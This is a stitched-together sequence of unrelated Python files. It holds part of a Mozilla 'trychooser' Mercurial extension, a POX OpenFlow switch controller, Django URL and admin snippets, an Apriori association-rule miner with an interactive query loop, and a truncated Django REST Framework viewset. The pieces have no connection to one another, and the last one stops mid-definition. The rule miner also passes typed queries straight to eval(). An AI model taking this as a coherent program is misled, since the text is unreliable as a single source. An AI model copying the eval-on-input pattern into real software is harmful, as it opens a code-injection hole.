u_mochitests_any = N ("Run any mochitests", "Run any of the mochitests", '')
u_mochitest1 = N ("mochitest-1", "Run mochitest-1", 'mochitest-1,')
u_mochitest2 = N ("mochitest-2", "Run mochitest-2", 'mochitest-2,')
u_mochitest3 = N ("mochitest-3", "Run mochitest-3", 'mochitest-3,')
u_mochitest4 = N ("mochitest-4", "Run mochitest-4", 'mochitest-4,')
u_mochitest5 = N ("mochitest-5", "Run mochitest-5", 'mochitest-5,')
u_mochitestbc = N ("mochitest-bc", "Run mochitest-browser-chrome", 'mochitest-bc,')
u_mochitesto = N ("mochitest-o", "Run mochitest-o", 'mochitest-o,')
## Android only suite names
u_mochitest6 = N ("mochitest-6", "Run mochitest-6 (android-only)", 'mochitest-6,')
u_mochitest7 = N ("mochitest-7", "Run mochitest-7 (android-only)", 'mochitest-7,')
u_mochitest8 = N ("mochitest-8", "Run mochitest-8 (android-only)", 'mochitest-8,')
u_reftest1 = N ("reftest-1", "Run reftest-1 (android-only)", 'reftest-1,')
u_reftest2 = N ("reftest-2", "Run reftest-2 (android-only)", 'reftest-2,')
u_reftest3 = N ("reftest-3", "Run reftest-3 (android-only)", 'reftest-3,')
u_reftest4 = N ("reftest-4", "Run reftest-4 (android-only)", 'reftest-4,')
u_crashtest1 = N ("crashtest-1", "Run crashtest-1 (android-only)", 'crashtest-1,')
u_crashtest2 = N ("crashtest-2", "Run crashtest-2 (android-only)", 'crashtest-2,')
u_crashtest3 = N ("crashtest-3", "Run crashtest-3 (android-only)", 'crashtest-3,')
u_jsreftest1 = N ("jsreftest-1", "Run jsreftests-1 (android-only)", 'jsreftest-1,')
u_jsreftest2 = N ("jsreftest-2", "Run jsreftests-2 (android-only)", 'jsreftest-2,')
u_jsreftest3 = N ("jsreftest-3", "Run jsreftests-3 (android-only)", 'jsreftest-3,')
u_robocop1 = N ("robocop-1", "Run robocop-1 tests (android-only)", 'robocop-1,')
u_robocop2 = N ("robocop-2", "Run robocop-2 tests (android-only)", 'robocop-2,')
u_robocop3 = N ("robocop-3", "Run robocop-3 tests (android-only)", 'robocop-3,')
u_robocop4 = N ("robocop-4", "Run robocop-4 tests (android-only)", 'robocop-4,')
## B2G only suite names
u_reftest5 = N ("reftest-5", "Run reftest-5 (B2G-only)", 'reftest-5,')
u_reftest6 = N ("reftest-6", "Run reftest-6 (B2G-only)", 'reftest-6,')
u_marionette_webapi = N ("marionette-webapi", "Run marionette-webapi (B2G-only)", 'marionette-webapi,')
u_none = NoPrompt (" -u none")
t_all = N ("All talos tests", "Run all talos tests on all chosen platforms", ' -t all')
t_any = N ("Any talos tests", "Would you like to be asked about running each set of talos tests", ' -t ')
t_tpn = N ("tpn", "Run tpn suite", 'tpn,')
t_nochromer = N ("nochromer", "Run nochromer suite", 'nochromer,')
t_other = N ("other", "Run other suite", 'other,')
t_dirtypaint = N ("dirtypaint", "Run dirtypaint suite", 'dirtypaint,')
t_svgr = N ("svgr", "Run svgr suite", 'svgr,')
t_dromaeojs = N ("dromaeojs", "Run dromaeojs suite", 'dromaeojs,')
t_xperf = N ("xperf", "Run xperf suite", 'xperf,')
t_none = NoPrompt (" -t none")
remote_talos = ','.join(['remote-ts', 'remote-tdhtml', 'remote-tsvg', 'remote-tpan',
                         'remote-trobopan', 'remote-trobocheck', 'remote-troboprovider',
                         'remote-trobocheck2', 'remote-trobocheck3', 'remote-tp4m_nochrome',])
t_all_android = N ("All android talos tests", "Run all android talos tests", remote_talos)
t_any_android = N ("Any android talos tests", "Run any android talos tests", '')
t_ts_r = N ("remote-ts", "Run Android ts suite", 'remote-ts,')
t_tdhtml_r = N ("remote-tdhtml", "Run Android tdhtml suite", 'remote-tdhtml,')
t_tsvg_r = N ("remote-tsvg", "Run Android tsvg suite", 'remote-tsvg,')
t_tpan_r = N ("remote-tpan", "Run Android tpan suite", 'remote-tpan,')
t_trobopan_r = N ("remote-trobopan", "Run Android trobopan suite", 'remote-trobopan,')
t_trobocheck_r = N ("remote-trobocheck", "Run Android trobocheck suite", 'remote-trobocheck,')
t_trobocheck2_r = N ("remote-trobocheck2", "Run Android trobocheck2 suite", 'remote-trobocheck2,')
t_trobocheck3_r = N ("remote-trobocheck3", "Run Android trobocheck3 suite", 'remote-trobocheck3,')
t_troboprovider_r = N ("remote-troboprovider", "Run Android troboprovider suite", 'remote-troboprovider,')
t_nochrome_r = N ("remote-tp4m_nochrome", "Run tp4m nochrome suite", 'remote-tp4m_nochrome,')
t_none_r = NoPrompt ("")
################
# Build decision tree. Each object has a y and n property, which are chosen if
# Y or N is chosen. That property is the next question.
################
# Most nodes set y and n to the SAME next node: either answer advances the
# questionnaire; only the action text differs (appended on 'yes').
# D(...) wrappers strip the trailing comma left by the last list answer.
a.y = finish
a.n = b_od
b_od.y = p_all
b_od.n = b_o
b_o.y = p_all
b_o.n = b_d
b_d.y = p_all
b_d.n = error
p_all.y = u_all
p_all.n = p_any
p_any.next = p_linux
p_linux.y = p_linux64
p_linux.n = p_linux64
p_linux64.y = p_macosx64
p_linux64.n = p_macosx64
p_macosx64.y = p_win32
p_macosx64.n = p_win32
p_win32.y = p_win64
p_win32.n = p_win64
p_win64.y = p_android
p_win64.n = p_android
p_android.y = p_android_armv6
p_android.n = p_android_armv6
p_android_armv6.y = p_android_noion
p_android_armv6.n = p_android_noion
p_android_noion.y = p_emulator
p_android_noion.n = p_emulator
p_emulator.y = p_emulator_jb
p_emulator.n = p_emulator_jb
p_emulator_jb.y = p_emulator_kk
p_emulator_jb.n = p_emulator_kk
p_emulator_kk.y = D(u_all)
p_emulator_kk.n = D(u_all)
u_all.y = t_all
u_all.n = u_any
u_any.y = u_reftest
u_any.n = u_none
u_none.next = t_all
u_reftest.y = u_reftest1
u_reftest.n = u_reftest1
u_reftest1.y = u_reftest2
u_reftest1.n = u_reftest2
u_reftest2.y = u_reftest3
u_reftest2.n = u_reftest3
u_reftest3.y = u_reftest4
u_reftest3.n = u_reftest4
u_reftest4.y = u_reftest5
u_reftest4.n = u_reftest5
u_reftest5.y = u_reftest6
u_reftest5.n = u_reftest6
u_reftest6.y = u_reftest_ipc
u_reftest6.n = u_reftest_ipc
u_reftest_ipc.y = u_reftest_naccel
u_reftest_ipc.n = u_reftest_naccel
u_reftest_naccel.y = u_crashtest
u_reftest_naccel.n = u_crashtest
u_crashtest.y = u_crashtest1
u_crashtest.n = u_crashtest1
u_crashtest1.y = u_crashtest2
u_crashtest1.n = u_crashtest2
u_crashtest2.y = u_crashtest3
u_crashtest2.n = u_crashtest3
u_crashtest3.y = u_crashtest_ipc
u_crashtest3.n = u_crashtest_ipc
u_crashtest_ipc.y = u_xpcshell
u_crashtest_ipc.n = u_xpcshell
u_xpcshell.y = u_jsreftest
u_xpcshell.n = u_jsreftest
u_jsreftest.y = u_jsreftest1
u_jsreftest.n = u_jsreftest1
u_jsreftest1.y = u_jsreftest2
u_jsreftest1.n = u_jsreftest2
u_jsreftest2.y = u_jsreftest3
u_jsreftest2.n = u_jsreftest3
u_jsreftest3.y = u_jetpack
u_jsreftest3.n = u_jetpack
u_jetpack.y = u_marionette
u_jetpack.n = u_marionette
u_marionette.y = u_marionette_webapi
u_marionette.n = u_marionette_webapi
u_marionette_webapi.y = u_mozmill
u_marionette_webapi.n = u_mozmill
u_mozmill.y = u_robocop1
u_mozmill.n = u_robocop1
u_robocop1.y = u_robocop2
u_robocop1.n = u_robocop2
u_robocop2.y = u_robocop3
u_robocop2.n = u_robocop3
u_robocop3.y = u_robocop4
u_robocop3.n = u_robocop4
u_robocop4.y = u_mochitests
u_robocop4.n = u_mochitests
u_mochitests.y = D(t_all)
u_mochitests.n = u_mochitests_any
u_mochitests_any.y = u_mochitest1
u_mochitests_any.n = D(t_all)
u_mochitest1.y = u_mochitest2
u_mochitest1.n = u_mochitest2
u_mochitest2.y = u_mochitest3
u_mochitest2.n = u_mochitest3
u_mochitest3.y = u_mochitest4
u_mochitest3.n = u_mochitest4
u_mochitest4.y = u_mochitest5
u_mochitest4.n = u_mochitest5
u_mochitest5.y = u_mochitest6
u_mochitest5.n = u_mochitest6
u_mochitest6.y = u_mochitest7
u_mochitest6.n = u_mochitest7
u_mochitest7.y = u_mochitest8
u_mochitest7.n = u_mochitest8
u_mochitest8.y = u_mochitestbc
u_mochitest8.n = u_mochitestbc
u_mochitestbc.y = u_mochitesto
u_mochitestbc.n = u_mochitesto
u_mochitesto.y = D(t_all)
u_mochitesto.n = D(t_all)
t_all.y = finish
t_all.n = t_any
t_any.y = t_tpn
t_any.n = t_none
t_none.next = finish
t_tpn.y = t_nochromer
t_tpn.n = t_nochromer
t_nochromer.y = t_other
t_nochromer.n = t_other
t_other.y = t_dirtypaint
t_other.n = t_dirtypaint
t_dirtypaint.y = t_svgr
t_dirtypaint.n = t_svgr
t_svgr.y = t_dromaeojs
t_svgr.n = t_dromaeojs
t_dromaeojs.y = t_xperf
t_dromaeojs.n = t_xperf
t_xperf.y = t_all_android
t_xperf.n = t_all_android
t_all_android.y = finish
t_all_android.n = t_any_android
t_any_android.y = t_ts_r
t_any_android.n = t_none_r
t_none_r.next = finish
t_ts_r.y = t_tdhtml_r
t_ts_r.n = t_tdhtml_r
t_tdhtml_r.y = t_tsvg_r
t_tdhtml_r.n = t_tsvg_r
t_tsvg_r.y = t_tpan_r
t_tsvg_r.n = t_tpan_r
t_tpan_r.y = t_trobopan_r
t_tpan_r.n = t_trobopan_r
t_trobopan_r.y = t_trobocheck_r
t_trobopan_r.n = t_trobocheck_r
t_trobocheck_r.y = t_trobocheck2_r
t_trobocheck_r.n = t_trobocheck2_r
t_trobocheck2_r.y = t_trobocheck3_r
t_trobocheck2_r.n = t_trobocheck3_r
t_trobocheck3_r.y = t_troboprovider_r
t_trobocheck3_r.n = t_troboprovider_r
t_troboprovider_r.y = t_nochrome_r
t_troboprovider_r.n = t_nochrome_r
t_nochrome_r.y = D(finish)
t_nochrome_r.n = D(finish)
################
# The actual algorithm is simple
################
def run_algorithm(state):
    """Walk the decision graph starting at node `a`, building a trychooser string.

    `state` provides say()/prompt()/exit() (see Test_interface / HG_interface).
    Node kinds drive the walk:
      - D: backtrack marker, drops the last character appended so far
      - NoPrompt: appends its action unconditionally
      - N: asks a yes/no question; 'y' appends the node's action
    Returns the completed 'try: ...' syntax string after sanity-checking it.
    """
    node = a
    string = 'try:'
    while node != finish:
        if node == error:
            state.say("Invalid selection")
            state.exit(-1)
        elif isinstance(node, D):
            string = string[:-1] # remove last character
            node = node.next
        elif isinstance(node, NoPrompt):
            string += node.action
            node = node.next
        elif isinstance(node, N):
            state.say(node.prompt + '?')
            # NOTE(review): shadows the builtin `input`; also '' in 'Yy' is
            # True, so pressing plain Enter counts as Yes — confirm intended.
            input = state.prompt()
            if input in 'Yy':
                string += node.action
                node = node.y
            elif input in 'Nn':
                node = node.n
            elif input == '?':
                state.say(node.help)
            else:
                state.say("Invalid option, please try again")
    ################
    # Hard to test these above, so use string search for weird flag combination
    ################
    platforms = 'linux,linux64,macosx64,win32,win64,android,android-armv6,android-noion,emulator,panda,unagi'.split(',')
    unittests = 'reftest,reftest-ipc,reftest-no-accel,crashtest,crashtest-ipc,xpcshell,jsreftest,jetpack,marionette,mozmill,mochitests,reftest-1,reftest-2,reftest-3,reftest-4,jsreftest-1,jsreftest-2,jsreftest-3,crashtest-2,crashtest-3,mochitest-6,mochitest-7,mochitest-8,mochitest-bc,robocop-1,robocop-2,robocop-3,robocop-4,reftest-1,reftest-2,reftest-3,reftest-4,reftest-5,reftest-6,marionette-webapi'.split(',')
    taloss = 'nochrome,dromaeo,a11y,svg,chrome,tp,dirty,scroll,cold,v8'.split(',')
    # find() returns -1 when absent, so a sum of -2 means both flags missing.
    if string.find ('-p') + string.find('-a') == -2:
        state.say("no platform selected")
        state.say ("Invalid selection: " + string)
        state.exit(-1)
    if string.find ('-b') + string.find('-a') == -2:
        state.say ("no build selected")
        state.say ("Invalid selection: " + string)
        state.exit(-1)
    # -p given without 'all' must name at least one concrete platform.
    if string.find ('-p') != -1 and \
        string.find ('-p all') == -1 and \
        (sum([string.find(x) for x in platforms]) == -1*len(platforms)):
        state.say ("no platforms selected, despite asking for some")
        state.say ("Invalid selection: " + string)
        state.exit(-1)
    if string.find ('-u') != -1 and \
        string.find ('-u all') == -1 and \
        string.find ('-u none') == -1 and \
        (sum([string.find(x) for x in unittests]) == -1*len(unittests)):
        state.say ("no unit tests selected, despite asking for some")
        state.say ("Invalid selection: " + string)
        state.exit(-1)
    if string.find ('-t') != -1 and \
        string.find ('-t all') == -1 and \
        string.find ('-t none') == -1 and \
        (sum([string.find(x) for x in taloss]) == -1*len(taloss)):
        state.say ("no talos tests selected, despite asking for some")
        state.say ("Invalid selection: " + string)
        state.exit(-1)
    return string
# Wrapper function for ui.promptchoice because newer versions take two
# parameters with a unified message and choices string and older versions take
# three parameters with separate strings.
def promptchoice(ui, prompt, choices):
    """Call ui.promptchoice across old and new Mercurial signatures.

    Old ui.promptchoice(msg, choices, default) has 4 parameters including
    self; the newer API takes one ' $$ '-joined string.  Returns the index
    of the chosen option (default 0).
    """
    # inspect.getargspec was removed in Python 3.11; prefer getfullargspec
    # when available and fall back for old interpreters.
    getspec = getattr(inspect, 'getfullargspec', None) or inspect.getargspec
    num_args = len(getspec(ui.promptchoice)[0])
    if num_args == 4:
        return ui.promptchoice(prompt, choices, default=0)
    elif num_args == 3:
        prompt_list = [prompt]
        prompt_list.extend(choices)
        unified_prompt = ' $$ '.join(prompt_list)
        return ui.promptchoice(unified_prompt, default=0)
if __name__ == '__main__':
    # Stand-alone mode: drive the question graph from the console (Python 2).
    class Test_interface:
        # print isn't a function
        def say(self, string):
            print string
        def prompt(self):
            return raw_input('[Ynh?]\n')
        def exit(self, code):
            sys.exit(code)
    print run_algorithm(Test_interface())
else:
    # Loaded as a Mercurial extension: adapt ui/repo to the same interface.
    from mercurial import ui
    from mercurial import extensions
    from mercurial.i18n import _
    from mercurial import commands
    from mercurial import util
    class HG_interface:
        """Adapts Mercurial's ui object to the say/prompt/exit protocol
        expected by run_algorithm()."""
        def __init__ (self, ui, repo):
            self.ui = ui
            self.repo = repo
        def say(self, string):
            self.ui.write(string + '\n')
            self.ui.flush()
        def prompt(self):
            # Map the chosen index back onto the literal answer character.
            index = promptchoice(self.ui, '[Ynh?]', ['&Yes', '&no', '&h', '&?'])
            return 'Ynh?'[index]
        def exit(self, code):
            sys.exit(code)
def suggest_results_bug(ui, repo):
    """Ask whether to post results to a bug and return the chosen bug number.

    Suggests a bug number parsed from the top applied mq patch's commit
    message.  Returns None when the user declines; otherwise loops until a
    valid integer is entered.
    """
    ui.write('Leave a comment in a bug on completion?\n')
    # promptchoice returns 0 for &Yes, 1 for &no.
    if promptchoice(ui, '[Yn]', ['&Yes', '&no']):
        return None
    # Derive a suggested bug number in which to leave results (regex stolen from bzexport.py)
    bug_re = re.compile(r'''# bug followed by any sequence of numbers, or
                            # a standalone sequence of numbers
                            (
                                (?:
                                    bug |
                                    b= |
                                    # a sequence of 5+ numbers preceded by whitespace
                                    (?=\b\#?\d{5,}) |
                                    # numbers at the very beginning
                                    ^(?=\d)
                                )
                                (?:\s*\#?)(\d+)
                            )''', re.I | re.X)
    rev = repo.mq.applied[-1].name
    match = re.search(bug_re, repo[rev].description())
    s = 'Bug number'
    suggested = None
    if match:
        suggested = match.group(2)
        s += ' (%s)' % suggested
    ui.write('%s:\n' % s)
    while True:
        try:
            numstr = ui.prompt('', str(suggested))
            return int(numstr)
        except ValueError:
            # Was a bare `except:`, which also swallowed KeyboardInterrupt
            # and made Ctrl-C loop forever; only bad integers should retry.
            ui.write('Invalid bug number\n')
def run_mercurial_command(ui, repo, *args, **opts):
    """Build a TryChooser string by asking a few questions.
    For all questions, choosing Y means adding something to the TryChooser string. Choosing ? shows context-sensitive help."""
    try:
        mq = extensions.find('mq')
    except KeyError:
        # Without mq we cannot create/push a patch; just print the syntax.
        ui.warn(_("Warning: mq extension hasn't been found, this is going to print the syntax only.\n"))
        string = run_algorithm(HG_interface(ui, repo))
        ui.write(string + '\n')
        return
    if repo[None].dirty():
        raise util.Abort(_("local changes found, refresh first"))
    if opts.get('message'):
        msg = opts.get('message')
        if msg.find('try:') == -1:
            msg = 'try: ' + msg
    else:
        msg = run_algorithm(HG_interface(ui, repo))
        bugnum = suggest_results_bug(ui, repo)
        if bugnum:
            msg += ' --post-to-bugzilla Bug %s' % bugnum
    ui.write(_("The following try message is going to be used:\n%s\n") % msg)
    ui.write(_("Creates the trychooser mq entry...\n"))
    mq.new(ui, repo, 'trychooser', message=msg)
    if opts.get('dry_run'):
        ui.write(_("Pretending to push to try server...\n"))
    else:
        ui.write(_("Push to try server...\n"))
        try:
            commands.push(ui, repo, "ssh://hg.mozilla.org/try", force=True,
                          rev=[repo['.'].rev()])
        except Exception:
            # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # propagate; a failed push still falls through to cleanup below.
            ui.write("ERROR: failed to push to try server!\n")
        # In Mercurial 2.1 phases support was added, and until Mozilla updates to
        # this version and configures the try repository to be non-publishing, we
        # need to reset the pushed patches to be editable again.
        try:
            commands.phase(ui, repo, 'mq()', draft=True, public=False, secret=False, force=True, rev="")
        except AttributeError:
            pass # we're running a old Mercurial version, don't bother.
    mq.pop(ui, repo)
    mq.delete(ui, repo, 'trychooser')
# Mercurial interface
# Registers the `hg trychooser` command with its two options.
cmdtable = {
    "trychooser":
        (run_mercurial_command,
         [
             ('n', 'dry-run', False, _('do not perform actions, just print output')),
             ('m', 'message', '', _('use text as try message'))
         ],
         _('hg trychooser [-m TEXT]')
        )
}
# TODO: add an MQ option to qrefresh
|
# Copyright 2012 James McCauley
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#ovs-vsctl -- --id=@ft create Flow_Table flow_limit=100 overflow_policy=refuse -- set Bridge br0 flow_tables=0=@ft
from pox.core import core
import pox.openflow.libopenflow_01 as of
from pox.lib.util import dpidToStr
from pox.lib.packet.ethernet import ethernet, ETHER_BROADCAST
from pox.lib.packet.ipv4 import ipv4
from pox.openflow.of_json import flow_stats_to_list
from pox.lib.addresses import IPAddr, EthAddr
log = core.getLogger()
def _handle_ConnectionUp (event):
    """Install the initial forwarding rule when a switch connects.

    Identifies the switch by DPID, pushes a port-2 -> port-1 flow with a
    10s hard timeout, then asks the switch for its flow statistics.
    """
    switch_names = {
        '00-e0-4c-2a-33-4f': 'Switch UL',
        '00-08-54-aa-cb-bc': 'Switch DL',
        '00-06-4f-86-af-ff': 'Switch HW',
        '00-40-a7-0c-01-75': 'Switch SW',
    }
    nomeswitch = switch_names.get(dpidToStr(event.dpid), 'Switch desconhecido')
    log.info("%s conectado.", nomeswitch)
    # Flow: everything arriving on port 2 is forwarded out port 1.
    regra = of.ofp_flow_mod()
    regra.match.in_port = 2
    regra.priority = 2
    regra.actions.append(of.ofp_action_output(port = 1))
    regra.hard_timeout = 10
    addRegra(event, regra)
    # Immediately request the flow table so stats handlers fire.
    event.connection.send(of.ofp_stats_request(body=of.ofp_flow_stats_request()))
    log.info("Regras adicionadas.")
def _handle_FlowRemoved(event):
    # Fired when a flow entry expires (hard/idle timeout) or is deleted.
    log.info("Regra expirada/removida")
    # Python 2 print statement: dump the byte count of the removed flow.
    print event.ofp.byte_count
# Handle the switch's flow statistics (and move rules).
def _handle_FlowStatsReceived (event):
    stats = flow_stats_to_list(event.stats) # all of the rules as one list
    log.info("FlowStatsReceived -> %s", stats)
# Add a rule to the switch.
def addRegra (event, regra):
    # Ask the switch to notify us when this flow is removed.
    regra.flags |= of.OFPFF_SEND_FLOW_REM
    event.connection.send(regra)
    log.info("Regra adicionada")
def getflowstats(event):
    # Request the switch's full flow-statistics table.
    event.connection.send(of.ofp_stats_request(body=of.ofp_flow_stats_request()))
def launch ():
    # POX entry point: wire up the OpenFlow event handlers.
    core.openflow.addListenerByName("ConnectionUp", _handle_ConnectionUp)
    core.openflow.addListenerByName("FlowRemoved", _handle_FlowRemoved)
    core.openflow.addListenerByName("FlowStatsReceived", _handle_FlowStatsReceived)
    log.info("Executando codigo...")
from django.urls import path
from . import views
# URL routes: index/about pages, kid list/detail, per-date detail,
# and log edit/delete actions.
urlpatterns = [
    path('', views.index, name='index'),
    path('about/', views.about, name='about'),
    path('kids/', views.KidListView.as_view(), name='kids'),
    path('kids/<int:pk>', views.KidDetailView.as_view(), name='kid-detail'),
    # NOTE(review): DateListView is passed without .as_view(); if it is a
    # class-based view like the others this fails at request time — verify
    # it is actually a function view.
    path('kids/<int:pk>/<slug:date>', views.DateListView, name='date-detail'),
    path('log/edit/<int:pk>', views.edit_log, name="edit_log"),
    path('log/delete/<int:pk>', views.delete_log, name="delete_log"),
]
from django.contrib import admin
from .models import Expense, Expense_Type, Unit
# Expose the expense models in the Django admin site.
admin.site.register(Expense)
admin.site.register(Unit)
admin.site.register(Expense_Type)
|
import itertools
import pandas as pd
import numpy as np
import sys
from collections import defaultdict
# First CLI argument: path to the tab-separated gene data file.
data_file = sys.argv[1]
with open(data_file, 'r') as f: # open the file
    contents = f.readlines()
data_genes = []        # one token list per input line (transaction)
frequent_1set = set()  # every distinct item seen in the data
# Generate all r-element combinations of the given itemset, as sets.
def combination_gen(itemsets, r):
    """Return every r-item combination of *itemsets* as a list of sets."""
    return [set(combo) for combo in itertools.combinations(itemsets, r)]
# Generate every non-empty subset of arr (as tuples), smallest first.
def subsets(arr):
    """Return all non-empty combinations of *arr*, grouped by size 1..len(arr)."""
    out = []
    for size in range(1, len(arr) + 1):
        out.extend(itertools.combinations(arr, size))
    return out
# Join step: union pairs of itemsets, keeping only unions of the target length.
def joinSet(itemSet, length):
    """Return the set of all pairwise unions from *itemSet* with exactly *length* items."""
    return set(a.union(b) for a in itemSet for b in itemSet
               if len(a.union(b)) == length)
# parse input data
# Each line is a sample; column i becomes the token "Gi_<value>" so that
# identical values in different columns stay distinct items.
for line in contents:
    i = 1;
    l1 = line.replace("\n", "").split("\t")
    gene = []
    for att in l1:
        a = "G" + str(i) + "_" + att.replace(" ", "_")
        gene.append(a)
        frequent_1set.add(a)
        i = i + 1
    data_genes.append(gene)
# minsupport (CLI percentage converted to a 0..1 fraction)
support = (int(sys.argv[2]) / 100)
# minconfidence (CLI percentage converted to a 0..1 fraction)
minConfidence = int(sys.argv[3]) / 100
transactionList = list()
itemSet = set()
# Generate all length-1 candidate itemsets
for record in data_genes:
    transaction = frozenset(record)
    transactionList.append(transaction)
    for item in transaction:
        itemSet.add(frozenset([item]))
a, b = itemSet, transactionList
# Prune step: keep only candidates whose support meets the threshold.
def frequentItemSet(itemSet, transactionList, minSupport, freqSet):
    """Count each candidate's occurrences across the transactions, add the
    counts to *freqSet*, and return the candidates whose relative support is
    at least *minSupport*."""
    localSet = defaultdict(int)
    for transaction in transactionList:
        for item in itemSet:
            if item.issubset(transaction):
                freqSet[item] += 1
                localSet[item] += 1
    total = float(len(transactionList))
    return set(item for item, count in localSet.items()
               if count / total >= minSupport)
# Generate length 1 frequent item sets
freqSet = defaultdict(int) # Store support count for itemsets
iset = frequentItemSet(a, b, support, freqSet)
#print("number of length-" + str(1) + " frequent itemsets:" + str(len(iset)))
currentLSet = iset
k = 2
AllFrequentItemsets = dict() # Store all length frequent item sets
# loop to generate all length frequent itemsets (classic Apriori level-wise pass)
while (currentLSet != set([])):
    AllFrequentItemsets[k - 1] = currentLSet
    currentLSet = joinSet(currentLSet, k) # joinset to generate length k item sets from length k-1 itemsets
    currentCSet = frequentItemSet(currentLSet, b, support, freqSet) # frequentItemSet to generate frequent item sets with support >= minsupport
    #print("number of length-" + str(k) + " frequent itemsets:" + str(len(currentCSet)))
    currentLSet = currentCSet
    k = k + 1
c = 0
for k, v in AllFrequentItemsets.items():
    c = c + len(v)
#print("number of all length frequent itemsets:" + str(c))
# Generate Rule with Confidence >= minconfidence
toRetRules = []
c = 0
for key, value in AllFrequentItemsets.items():
    for item in value:
        _subsets = map(frozenset, [x for x in subsets(item)])
        for element in _subsets:
            remain = item.difference(element) # Obtain BODY
            if len(remain) > 0:
                f1 = float(freqSet[item]) / len(transactionList) # Support of RULE
                f2 = float(freqSet[element]) / len(transactionList) # Support of HEAD
                # NOTE(review): debug prints only — if f2 is ever 0 the
                # division below still raises ZeroDivisionError; confirm this
                # cannot happen for subsets of a frequent itemset.
                if (f2 == 0):
                    print(freqSet[element])
                    print(item, element)
                confidence = f1 / f2
                if confidence >= minConfidence:
                    c = c + 1
                    toRetRules.append((str(list(item)), str(list(element)), str(list(remain)),
                                       str(confidence)))
dfObj = pd.DataFrame(toRetRules, columns=['RULE', 'HEAD', 'BODY', 'CONFIDENCE']) # Rules dataframe
print("total number of rules generated " + str(len(dfObj)))
# Write rules to a .csv file
dfObj.to_csv('Rules.csv', sep=',')
print(str(len(dfObj)) + " rules generated.")
def queryInput(query):
    """Dispatch a raw query string to the matching template handler.

    The query looks like "asso_rule.templateN(<args tuple>)"; the argument
    tuple is eval()'d, so this must only run on trusted interactive input
    (the REPL below catches any failure raised here).

    Raises:
        ValueError: if the query does not name template1/2/3 (previously
        this path crashed with UnboundLocalError on `Result`).
    """
    if (query[:19] == 'asso_rule.template1'):
        Result = Template1(eval(query[19:])) # Obtain Template 1 result
    elif (query[:19] == 'asso_rule.template2'):
        Result = Template2(eval(query[19:])) # Obtain Template 2 result
    elif (query[:19] == 'asso_rule.template3'):
        Result = Template3(eval(query[19:])) # Obtain Template 3 result
    else:
        raise ValueError("unrecognized query: " + query)
    return Result.drop_duplicates()
# Template1 Query
def Template1(query):
    """Template 1: select rules by item membership in one column.

    query = (column, mode, items) with column in {"RULE", "HEAD", "BODY"}
    and mode one of "ANY" (at least one item), "NONE" (no item) or 1
    (exactly one of the items).  Unknown column/mode yields an empty frame.

    Uses pd.concat because DataFrame.append was removed in pandas 2.0.
    """
    column, mode, items = query[0], query[1], query[2]
    empty = pd.DataFrame(data=None, columns=dfObj.columns)
    if column not in ('RULE', 'BODY', 'HEAD'):
        return empty.drop_duplicates()
    if mode == "ANY":
        Result = _template1_any(column, items)
    elif mode == "NONE":
        Result = _template1_none(column, items)
    elif mode == 1:
        Result = _template1_one(column, items)
    else:
        Result = empty
    return Result.drop_duplicates()

def _template1_any(column, items):
    """Rows whose *column* string mentions at least one of *items*."""
    empty = pd.DataFrame(data=None, columns=dfObj.columns)
    matches = [dfObj[dfObj[column].str.contains(item)] for item in items]
    return pd.concat([empty] + matches)

def _template1_none(column, items):
    """Rows whose *column* string mentions none of *items*."""
    Result = dfObj.copy()
    for item in items:
        Result = Result[~Result[column].str.contains(item)]
    return Result

def _template1_one(column, items):
    """Rows that mention some item but never two of the items together.

    NOTE(review): the pair filter matches str(set)[1:-1], i.e. the textual
    repr of a 2-item set — kept verbatim from the original even though it
    depends on set iteration order.
    """
    Result = _template1_any(column, items)
    for pair in combination_gen(set(items), 2):
        Result = Result[~Result[column].str.contains(str(pair)[1:-1])]
    return Result
# Template2 Query
def Template2(query):
    """Template 2: select rules whose item count meets a minimum size.

    query = (column, min_size); "RULE" counts HEAD + BODY items together,
    "HEAD"/"BODY" count that column alone.  Boolean-mask indexing replaces
    the removed DataFrame.append and the O(n^2) row-by-row appends.
    """
    column, min_size = query[0], query[1]
    empty = pd.DataFrame(data=None, columns=dfObj.columns)
    if column == "RULE":
        mask = [len(eval(dfObj['BODY'].iloc[i])) + len(eval(dfObj['HEAD'].iloc[i])) >= min_size
                for i in range(len(dfObj))]
    elif column in ("BODY", "HEAD"):
        mask = [len(eval(dfObj[column].iloc[i])) >= min_size
                for i in range(len(dfObj))]
    else:
        return empty.drop_duplicates()
    mask = pd.Series(mask, index=dfObj.index, dtype=bool)
    return pd.concat([empty, dfObj[mask]]).drop_duplicates()
# Template3 Query
def Template3(query):
    """Template 3: combine two template-1/template-2 sub-queries.

    query[0] is one of "1or1", "1and1", "1or2", "1and2", "2or2", "2and2";
    each digit says which template its sub-query uses (template 1 takes 3
    parameters, template 2 takes 2), and or/and selects union vs. inner
    join.  Unknown operators return an empty frame, as before.

    Uses pd.concat because DataFrame.append was removed in pandas 2.0.
    """
    print(query)
    op = query[0]
    if op not in ("1or1", "1and1", "1or2", "1and2", "2or2", "2and2"):
        return pd.DataFrame(data=None, columns=dfObj.columns).drop_duplicates()
    first_len = 3 if op[0] == "1" else 2
    sub1, sub2 = query[1:1 + first_len], query[1 + first_len:]
    r1 = Template1(sub1) if op[0] == "1" else Template2(sub1)
    r2 = Template1(sub2) if op[-1] == "1" else Template2(sub2)
    if "or" in op:
        # Union of both result sets.
        Result = pd.concat([r1, r2])
    else:
        # Intersection via inner join on all columns.
        Result = pd.merge(r1, r2, how='inner',
                          on=['RULE', 'HEAD', 'BODY', 'CONFIDENCE'])
    return Result.drop_duplicates()
# Query Input
# Interactive REPL: reads template queries until the user types "exit".
while (True):
    print("Enter the Query")
    q = input("> ")
    try:
        if (q.lower() == "exit"):
            break
        else:
            r = queryInput(q)
            print(r[['HEAD', 'BODY']])
            print("rows retreived " + str(len(r)) + "\n")
    except:
        # Bare except: any malformed query (bad eval, unknown template) just
        # re-prompts. NOTE(review): this also swallows KeyboardInterrupt.
        print("Enter correct query.\n")
|
from rest_framework.parsers import JSONParser
from rest_framework import viewsets
from scapi.models.shoppingcartuser import shoppingcartuser
from scapi.serializers.shoppingcartuserSerializer import shoppingcartuserSerializer
class UserViewSet(viewsets.ModelViewSet):
